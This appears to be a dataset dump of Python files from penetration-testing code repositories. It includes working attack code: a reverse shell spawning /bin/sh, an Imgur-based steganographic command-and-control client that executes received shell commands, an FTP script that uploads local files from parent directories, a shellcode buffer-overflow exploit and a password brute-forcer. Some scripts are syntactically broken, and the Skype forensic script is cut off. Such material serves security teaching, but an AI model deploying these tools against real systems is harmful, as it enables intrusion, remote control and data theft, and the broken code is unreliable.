repo_name
stringclasses 29
values | text
stringlengths 18
367k
| avg_line_length
float64 5.6
132
| max_line_length
int64 11
3.7k
| alphnanum_fraction
float64 0.28
0.94
|
---|---|---|---|---|
cybersecurity-penetration-testing | from ftplib import FTP
import time
import os
user = sys.argv[1]
pw = sys.argv[2]
ftp = FTP("127.0.0.1", user, pw)
filescheck = "aa"
loop = 0
up = "../"
while 1:
files = os.listdir("./"+(i*up))
print files
for f in files:
try:
fiile = open(f, 'rb')
ftp.storbinary('STOR ftpfiles/00'+str(f), fiile)
fiile.close()
else:
pass
if filescheck == files:
break
else:
filescheck = files
loop = loop+1
time.sleep(10)
ftp.close()
| 13.411765 | 52 | 0.568507 |
Python-Penetration-Testing-for-Developers | from imgurpython import ImgurClient
import StegoText
import ast, os, time, shlex, subprocess, base64, random, sys
def get_input(string):
try:
return raw_input(string)
except:
return input(string)
def authenticate():
client_id = '<YOUR CLIENT ID>'
client_secret = '<YOUR CLIENT SECRET>'
client = ImgurClient(client_id, client_secret)
authorization_url = client.get_auth_url('pin')
print("Go to the following URL: {0}".format(authorization_url))
pin = get_input("Enter pin code: ")
credentials = client.authorize(pin, 'pin')
client.set_user_auth(credentials['access_token'], credentials['refresh_token'])
return client
client_uuid = "test_client_1"
client = authenticate()
a = client.get_account_albums("<YOUR IMGUR USERNAME>")
imgs = client.get_album_images(a[0].id)
last_message_datetime = imgs[-1].datetime
steg_path = StegoText.hide_message(random.choice(client.default_memes()).link,
"{'os':'" + os.name + "', 'uuid':'" + client_uuid + "','status':'ready'}",
"Imgur1.png",True)
uploaded = client.upload_from_path(steg_path)
client.album_add_images(a[0].id, uploaded['id'])
last_message_datetime = uploaded['datetime']
loop = True
while loop:
time.sleep(5)
imgs = client.get_album_images(a[0].id)
if imgs[-1].datetime > last_message_datetime:
last_message_datetime = imgs[-1].datetime
client_dict = ast.literal_eval(StegoText.extract_message(imgs[-1].link, True))
if client_dict['uuid'] == client_uuid:
command = base64.b32decode(client_dict['command'])
if command == "quit":
sys.exit(0)
args = shlex.split(command)
p = subprocess.Popen(args, stdout=subprocess.PIPE, shell=True)
(output, err) = p.communicate()
p_status = p.wait()
steg_path = StegoText.hide_message(random.choice(client.default_memes()).link,
"{'os':'" + os.name + "', 'uuid':'" + client_uuid + "','status':'response', 'response':'" + str(base64.b32encode(output)) + "'}",
"Imgur1.png", True)
uploaded = client.upload_from_path(steg_path)
client.album_add_images(a[0].id, uploaded['id'])
last_message_datetime = uploaded['datetime']
| 35.19403 | 164 | 0.592409 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.5
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
| 22.5 | 50 | 0.683761 |
Python-Penetration-Testing-for-Developers | import urllib
from bs4 import BeautifulSoup
url = "https://www.hackthissite.org"
ht= urllib.urlopen(url)
html_page = ht.read()
b_object = BeautifulSoup(html_page)
data = b_object.find('div', id ='notice')
print data | 26 | 41 | 0.739535 |
PenetrationTestingScripts | __author__ = 'John Berlin ([email protected])'
__version__ = '1.0.0'
__copyright__ = 'Copyright (c) 2018-Present John Berlin'
__license__ = 'MIT'
import time
import csv
import re
from os import path, makedirs
from glob import glob
import argparse
import requests
from bs4 import BeautifulSoup
import ujson as json
RAW_LISTS = 'rawUALists'
"""str: Default raw user agent dump path"""
CSV_DUMP = 'csv'
"""str: Default csv user agent list dump path"""
JSON_DUMP = 'json'
"""str: Default json user agent list dump path"""
WIMB_ORDER_RE = re.compile(r'page(\d+)\.html')
"""re: regular expression helper for sorting paginated ua html files"""
UA_LIST = [
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.01',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
'54.0.2840.71 Safari/537.36',
'Mozilla/5.0 (Linux; Ubuntu 14.04) AppleWebKit/537.36 Chromium/35.0.1870.2 Safa'
'ri/537.36',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.'
'0.2228.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko'
') Chrome/42.0.2311.135 '
'Safari/537.36 Edge/12.246',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, '
'like Gecko) Version/9.0.2 Safari/601.3.9',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/47.0.2526.111 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0',
]
"""list[str]: user agent strings used when fetching the lists"""
def get_xml_lists(save_path):
"""
Fetches the xml user agent lists and saves them at save_path
:param str save_path: Path to where to dump the raw user agent xml lists
"""
with open(path.join(save_path, 'ua_org_allagents.xml'), 'w') as out:
request = requests.get('http://www.user-agents.org/allagents.xml')
if request.ok:
out.write(request.text)
else:
print('Could not get http://www.user-agents.org/allagents.xml')
with open(path.join(save_path, 'techpatterns_com_useragentswitcher.xml'), 'w') as out:
request = requests.get(
'https://techpatterns.com/downloads/firefox/useragentswitcher.xml')
if request.ok:
out.write(request.text)
else:
print(
'Could not get https://techpatterns.com/downloads/firefox/useragentswitcher.xml')
def gen_from_xml(xml_dir, csv_dir=CSV_DUMP, json_dir=JSON_DUMP):
"""
Generates csv and json versions of techpatterns_com_useragentswitcher.xml
and ua_org_allagents.xml
:param str xml_dir: Path to the directory containing the two user agent lists in xml
:param str csv_dir: Path to directory to dump the csv files in. Defaults to <cwd>/csv
:param str json_dir: Path to directory to dump the json files in. Defaults to <cwd>/json
"""
ua_list = []
print('Generating user agent list for techpatterns_com_useragentswitcher.xml')
with open(path.join(xml_dir, 'techpatterns_com_useragentswitcher.xml'), 'r') as iin:
soup = BeautifulSoup(iin, 'lxml')
for search_folder in ['Browsers - Windows', 'Browsers - Mac',
'Browsers - Linux', 'Browsers - Unix',
'Mobile Devices', 'Spiders - Search', 'Miscellaneous']:
print(search_folder)
for folder in soup.find_all(
'folder', attrs={"description": search_folder}):
for user_agent in folder.find_all('useragent'):
ua_list.append(
dict(kind=search_folder, description=user_agent['description'],
ua=user_agent['useragent']))
with open(path.join(csv_dir, 'techpatterns_com_useragentswitcher.csv'), 'w') as csv_out:
csv_writer = csv.DictWriter(
csv_out, fieldnames=['kind', 'description', 'ua'])
csv_writer.writeheader()
csv_writer.writerows(ua_list)
with open(path.join(json_dir, 'techpatterns_com_useragentswitcher.json'), 'w') as json_out:
json_out.write(json.dumps(ua_list))
ua_list = []
print('Generating user agent list for ua_org_allagents.xml')
with open(path.join(xml_dir, 'ua_org_allagents.xml'), 'r') as iin:
soup = BeautifulSoup(iin, 'xml')
for user_agent in soup.find_all('user-agent'):
ua_list.append(dict(description=user_agent.find(
'Description').text, ua=user_agent.find('String').text))
with open(path.join(csv_dir, 'ua_org_allagents.csv'), 'w') as csv_out:
csv_writer = csv.DictWriter(csv_out, fieldnames=['description', 'ua'])
csv_writer.writeheader()
csv_writer.writerows(ua_list)
with open(path.join(json_dir, 'ua_org_allagents.json'), 'w') as json_out:
json_out.write(json.dumps(ua_list))
def xml_lists(raw_lists_path, csv_dir=CSV_DUMP, json_dir=JSON_DUMP):
"""
Fetches the xml user agent lists and transforms them into csv and json
:param str raw_lists_path: Path to directory to dump the raw lists. Defaults to <cwd>/rawUALists
:param str csv_dir: Path to directory to dump the csv files in. Defaults to <cwd>/csv
:param str json_dir: Path to directory to dump the json files in. Defaults to <cwd>/json
"""
get_xml_lists(raw_lists_path)
gen_from_xml(raw_lists_path, csv_dir=csv_dir, json_dir=json_dir)
def mine_dev_whatismybrowser(browser, save_path=RAW_LISTS, to_page=30):
"""
Retrieves the user agent strings for a browser listed on
developers.whatismybrowser.com up to to_pages
:param str browser: The browser to get the paginated list of user agent strings for
:param str save_path: The path to a directory to dump the. Defaults to <cwd>/rawUALists
:param int to_page: How many pages do you want to extract. Defaults to 30
"""
browser = browser.lower()
base_url = "https://developers.whatismybrowser.com/useragents/explore/software_name/%s" \
% browser
pag_url = base_url + "/%d"
save_dir = path.join(save_path, '%sUAHTML' % browser)
save_html = path.join(save_dir, 'page%d.html')
if not path.exists(save_dir):
makedirs(save_dir, exist_ok=True)
count = 0
with requests.session() as session:
for i in range(1, to_page + 1):
request = session.get(pag_url % i,
headers={'User-Agent': UA_LIST[count]}, timeout=5.0)
count += 1
if count == 8:
count = 0
if request.ok:
print('Got %s user agents on page %d' % (browser, i))
with open(save_html % i, 'w') as out:
out.write(request.text)
else:
print('Could not get %s user agents on page %d' % (browser, i))
time.sleep(2)
def wimb_page_order(ua_page):
"""
Helper for collect_ua_whatismybrowser that sorts the pages in correct order
:param str ua_page: Path to user agent html file
:return int: user agent pagination index
"""
return int(WIMB_ORDER_RE.match(path.basename(ua_page)).group(1))
def collect_ua_whatismybrowser(
browser, raw_dir=RAW_LISTS, csv_dir=CSV_DUMP, json_dir=JSON_DUMP):
"""
Parses all pages associated with a browser, generating browser.csv and browser.json
:param str browser: The browser to retrieve user agent strings for
:param str raw_dir: Path to the directory containing browser html file directory.
Defaults to <cwd>/rawUALists
:param str csv_dir: Path to directory to dump the csv files in. Defaults to <cwd>/csv
:param str json_dir: Path to directory to dump the json files in. Defaults to <cwd>/json
"""
ua_list = []
for page in sorted(glob(path.join(raw_dir, path.join(
'%sUAHTML', '*.html')) % browser), key=wimb_page_order):
with open(page, 'r') as iin:
soup = BeautifulSoup(iin, 'lxml')
for tr in soup.find_all('tr'):
ua_tds = tr.select('td.useragent')
if ua_tds:
tds = tr.find_all('td')
ua_list.append(
dict(ua=ua_tds[0].text, version=tds[1].text, commonality=tds[-1].text))
with open(path.join(csv_dir, '%s.csv' % browser), 'w') as csv_out:
csv_writer = csv.DictWriter(
csv_out, fieldnames=['ua', 'version', 'commonality'])
csv_writer.writeheader()
csv_writer.writerows(ua_list)
with open(path.join(json_dir, '%s.json' % browser), 'w') as json_out:
json_out.write(json.dumps(ua_list))
def whatismybrowser(raw_list_dir, to_page=30,
csv_dir=CSV_DUMP, json_dir=JSON_DUMP):
"""
Fetches user agent strings for Chrome, Firefox, Opera, Safari, IE, Android browser and
generates csv and json lists of the user agents per browser
:param str raw_list_dir:
:param int to_page: How many pages do you want to extract. Defaults to 30
:param str csv_dir: Path to directory to dump the csv files in. Defaults to <cwd>/csv
:param str json_dir: Path to directory to dump the json files in. Defaults to <cwd>/json
"""
browser_list = ['chrome', 'firefox', 'opera',
'safari', 'internet-explorer', 'android-browser']
for browser in browser_list:
print('Fetching user agent strings for %s' % browser)
mine_dev_whatismybrowser(
browser, save_path=raw_list_dir, to_page=to_page)
print('Collecting user agent strings for %s' % browser)
collect_ua_whatismybrowser(browser, raw_dir=raw_list_dir,
csv_dir=csv_dir, json_dir=json_dir)
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='useragents',
description='Get some user agent string lists')
parser.add_argument('-d', '--dump', help='Directory to dump the raw lists. '
'Defaults to <cwd>/rawUALists',
default=RAW_LISTS, type=str)
parser.add_argument('-c', '--csv', help='Directory to dump the csv lists in. '
'Defaults to <cwd>/csv',
default=CSV_DUMP, type=str)
parser.add_argument('-j', '--json', help='Directory to dump the json lists in. '
'Defaults to <cwd>/json',
default=JSON_DUMP, type=str)
parser.add_argument('-p', '--pages',
help='Number of pages that should be retrieved for '
'whatismybrowser user agents. Defaults to 30',
default=30, type=int)
fetch_group = parser.add_mutually_exclusive_group()
fetch_group.add_argument('-a', '--all',
help='Get both xml and whatismybrowser lists',
action='store_true', default=True)
fetch_group.add_argument('-w', '--wimb',
help='Get whatismybrowser lists',
action='store_true')
fetch_group.add_argument('-x', '--xml',
help='Get xml lists',
action='store_true')
args = parser.parse_args()
if not path.exists(args.dump):
makedirs(args.dump)
if not path.exists(args.csv):
makedirs(args.csv, exist_ok=True)
if not path.exists(args.json):
makedirs(args.json, exist_ok=True)
if args.all:
xml_lists(args.dump, csv_dir=args.csv, json_dir=args.json)
whatismybrowser(args.dump, to_page=args.pages, csv_dir=args.csv, json_dir=args.json)
elif args.xml:
xml_lists(args.dump, csv_dir=args.csv, json_dir=args.json)
elif args.wimb:
whatismybrowser(args.dump, to_page=args.pages, csv_dir=args.csv, json_dir=args.json)
| 45.335907 | 100 | 0.609083 |
PenetrationTestingScripts | #!/usr/bin/python
| 8.5 | 17 | 0.666667 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2015
Name: publicip.py
Purpose: To grab your current public IP address
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import urllib2
def get_public_ip(request_target):
grabber = urllib2.build_opener()
grabber.addheaders = [('User-agent','Mozilla/5.0')]
try:
public_ip_address = grabber.open(target_url).read()
except urllib2.HTTPError, error:
print("There was an error trying to get your Public IP: %s") % (error)
except urllib2.URLError, error:
print("There was an error trying to get your Public IP: %s") % (error)
return public_ip_address
public_ip = "None"
target_url = "http://ip.42.pl/raw"
public_ip = get_public_ip(target_url)
if not "None" in public_ip:
print("Your Public IP address is: %s") % (str(public_ip))
else:
print("Your Public IP address was not found")
| 44.470588 | 89 | 0.759707 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import socket
buffer=["A"]
counter=100
LPORT13327 = ""
LPORT13327 += "\xbe\x25\xf6\xa6\xe0\xd9\xed\xd9\x74\x24\xf4"
LPORT13327 += "\x5a\x33\xc9\xb1\x14\x83\xc2\x04\x31\x72\x10"
LPORT13327 += "\x03\x72\x10\xc7\x03\x97\x3b\xf0\x0f\x8b\xf8"
LPORT13327 += "\xad\xa5\x2e\x76\xb0\x8a\x49\x45\xb2\xb0\xcb"
LPORT13327 += "\x07\xda\x44\xf4\xb6\x46\x23\xe4\xe9\x26\x3a"
LPORT13327 += "\xe5\x60\xa0\x64\x2b\xf4\xa5\xd4\xb7\x46\xb1"
LPORT13327 += "\x66\xd1\x65\x39\xc5\xae\x10\xf4\x4a\x5d\x85"
LPORT13327 += "\x6c\x74\x3a\xfb\xf0\xc3\xc3\xfb\x98\xfc\x1c"
LPORT13327 += "\x8f\x30\x6b\x4c\x0d\xa9\x05\x1b\x32\x79\x89"
LPORT13327 += "\x92\x54\xc9\x26\x68\x16"
#Bingo this works--Had an issue with bad chars.Rev shell also works like charm
ret="\x97\x45\x13\x08"
crash=LPORT13327 +"\x41" *(4368-105) +ret + "\x83\xC0\x0C\xFF\xE0" + "\x90\x90"
#crash="/x41" * 4379
buffer = "\x11(setup sound " +crash + "\x90\x00#"
buffer = "\x11(setup sound "+ crash + "\x90\x00#"
if 1:
print"Fuzzing PASS with %s bytes" % len(buffer)
#print str(string)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('127.0.0.1',13327))
data=s.recv(1024)
#print str(data)
print(data)
s.send(buffer)
#data=s.recv(1024)
#print str(data)
print "done"
#s.send('QUIT\r\n')
s.close()
| 27.531915 | 80 | 0.65597 |
Hands-On-Bug-Hunting-for-Penetration-Testers | #!/usr/bin/env python2.7
import sys, json
from tabulate import tabulate
data = json.load(sys.stdin)
rows = []
def format_bug(vulnerability):
row = [
vulnerability['severity'],
vulnerability.get('identifiers').get('summary', 'N/A') if vulnerability.get('identifiers', False) else 'N/A',
vulnerability['file'] + "\n" + vulnerability.get('info', ['N/A'])[0]
]
return row
for item in data:
for vulnerability in item['results'][0]['vulnerabilities']:
vulnerability['file'] = item.get('file', 'N/A')
row = format_bug(vulnerability)
rows.append(row)
rows = sorted(rows, key=lambda x: x[0])
print(
"""
,--. ,---. ,-----.
| |' .-' | |) /_ ,--.,--. ,---. ,---.
,--. | |`. `-. | .-. \| || || .-. |( .-'
| '-' /.-' | | '--' /' '' '' '-' '.-' `)
`-----' `-----' `------' `----' .`- / `----'
`---'
""")
print tabulate(rows, headers=['Severity', 'Summary', 'Info & File'])
| 26.583333 | 111 | 0.465726 |
Hands-On-Penetration-Testing-with-Python | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Project'
db.create_table(u'xtreme_server_project', (
('project_name', self.gf('django.db.models.fields.CharField')(max_length=50, primary_key=True)),
('start_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('query_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
('consider_only', self.gf('django.db.models.fields.TextField')()),
('exclude_fields', self.gf('django.db.models.fields.TextField')()),
('status', self.gf('django.db.models.fields.CharField')(default='Not Set', max_length=50)),
('login_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('logout_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('username', self.gf('django.db.models.fields.TextField')()),
('password', self.gf('django.db.models.fields.TextField')()),
('username_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('password_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
))
db.send_create_signal(u'xtreme_server', ['Project'])
# Adding model 'Page'
db.create_table(u'xtreme_server_page', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('URL', self.gf('django.db.models.fields.URLField')(max_length=200)),
('content', self.gf('django.db.models.fields.TextField')(blank=True)),
('visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('status_code', self.gf('django.db.models.fields.CharField')(max_length=256, blank=True)),
('connection_details', self.gf('django.db.models.fields.TextField')(blank=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('page_found_on', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Page'])
# Adding model 'Form'
db.create_table(u'xtreme_server_form', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('form_found_on', self.gf('django.db.models.fields.URLField')(max_length=200)),
('form_name', self.gf('django.db.models.fields.CharField')(max_length=512, blank=True)),
('form_method', self.gf('django.db.models.fields.CharField')(default='GET', max_length=10)),
('form_action', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
('form_content', self.gf('django.db.models.fields.TextField')(blank=True)),
('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('input_field_list', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Form'])
# Adding model 'InputField'
db.create_table(u'xtreme_server_inputfield', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('input_type', self.gf('django.db.models.fields.CharField')(default='input', max_length=256, blank=True)),
))
db.send_create_signal(u'xtreme_server', ['InputField'])
# Adding model 'Vulnerability'
db.create_table(u'xtreme_server_vulnerability', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('details', self.gf('django.db.models.fields.TextField')(blank=True)),
('url', self.gf('django.db.models.fields.TextField')(blank=True)),
('re_attack', self.gf('django.db.models.fields.TextField')(blank=True)),
('project', self.gf('django.db.models.fields.TextField')(blank=True)),
('timestamp', self.gf('django.db.models.fields.TextField')(blank=True)),
('msg_type', self.gf('django.db.models.fields.TextField')(blank=True)),
('msg', self.gf('django.db.models.fields.TextField')(blank=True)),
('auth', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Vulnerability'])
# Adding model 'Settings'
db.create_table(u'xtreme_server_settings', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
('consider_only', self.gf('django.db.models.fields.TextField')()),
('exclude_fields', self.gf('django.db.models.fields.TextField')()),
('username', self.gf('django.db.models.fields.TextField')()),
('password', self.gf('django.db.models.fields.TextField')()),
('auth_mode', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'xtreme_server', ['Settings'])
# Adding model 'LearntModel'
db.create_table(u'xtreme_server_learntmodel', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Page'])),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('query_id', self.gf('django.db.models.fields.TextField')()),
('learnt_model', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['LearntModel'])
def backwards(self, orm):
# Deleting model 'Project'
db.delete_table(u'xtreme_server_project')
# Deleting model 'Page'
db.delete_table(u'xtreme_server_page')
# Deleting model 'Form'
db.delete_table(u'xtreme_server_form')
# Deleting model 'InputField'
db.delete_table(u'xtreme_server_inputfield')
# Deleting model 'Vulnerability'
db.delete_table(u'xtreme_server_vulnerability')
# Deleting model 'Settings'
db.delete_table(u'xtreme_server_settings')
# Deleting model 'LearntModel'
db.delete_table(u'xtreme_server_learntmodel')
models = {
u'xtreme_server.form': {
'Meta': {'object_name': 'Form'},
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'form_action': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'form_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'form_method': ('django.db.models.fields.CharField', [], {'default': "'GET'", 'max_length': '10'}),
'form_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_field_list': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"})
},
u'xtreme_server.inputfield': {
'Meta': {'object_name': 'InputField'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_type': ('django.db.models.fields.CharField', [], {'default': "'input'", 'max_length': '256', 'blank': 'True'})
},
u'xtreme_server.learntmodel': {
'Meta': {'object_name': 'LearntModel'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'learnt_model': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Page']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'query_id': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.page': {
'Meta': {'object_name': 'Page'},
'URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'connection_details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'status_code': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'xtreme_server.project': {
'Meta': {'object_name': 'Project'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
'login_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'logout_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'password': ('django.db.models.fields.TextField', [], {}),
'password_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'query_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'start_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Not Set'", 'max_length': '50'}),
'username': ('django.db.models.fields.TextField', [], {}),
'username_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"})
},
u'xtreme_server.settings': {
'Meta': {'object_name': 'Settings'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.TextField', [], {}),
'username': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.vulnerability': {
'Meta': {'object_name': 'Vulnerability'},
'auth': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msg': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'msg_type': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
're_attack': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'timestamp': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url': ('django.db.models.fields.TextField', [], {'blank': 'True'})
}
}
complete_apps = ['xtreme_server'] | 63.617925 | 130 | 0.570886 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
Python-Penetration-Testing-for-Developers | import requests
from requests.auth import HTTPBasicAuth
with open('passwords.txt') as passwords:
for pass in passwords.readlines():
r = requests.get('http://packtpub.com/login', auth=HTTPBasicAuth('user', pass, allow_redirects=False)
if r.status_code == 301 and 'login' not in r.headers['location']:
print 'Login successful, password:', pass
break | 42.666667 | 109 | 0.67602 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import sqlite3
import optparse
import os
def printProfile(skypeDB):
conn = sqlite3.connect(skypeDB)
c = conn.cursor()
c.execute("SELECT fullname, skypename, city, country, \
datetime(profile_timestamp,'unixepoch') FROM Accounts;")
for row in c:
print '[*] -- Found Account --'
print '[+] User : '+str(row[0])
print '[+] Skype Username : '+str(row[1])
print '[+] Location : '+str(row[2])+','+str(row[3])
print '[+] Profile Date : '+str(row[4])
def printContacts(skypeDB):
conn = sqlite3.connect(skypeDB)
c = conn.cursor()
c.execute("SELECT displayname, skypename, city, country,\
phone_mobile, birthday FROM Contacts;")
for row in c:
print '\n[*] -- Found Contact --'
print '[+] User : ' + str(row[0])
print '[+] Skype Username : ' + str(row[1])
if str(row[2]) != '' and str(row[2]) != 'None':
print '[+] Location : ' + str(row[2]) + ',' \
+ str(row[3])
if str(row[4]) != 'None':
print '[+] Mobile Number : ' + str(row[4])
if str(row[5]) != 'None':
print '[+] Birthday : ' + str(row[5])
def printCallLog(skypeDB):
conn = sqlite3.connect(skypeDB)
c = conn.cursor()
c.execute("SELECT datetime(begin_timestamp,'unixepoch'), \
identity FROM calls, conversations WHERE \
calls.conv_dbid = conversations.id;"
)
print '\n[*] -- Found Calls --'
for row in c:
print '[+] Time: '+str(row[0])+\
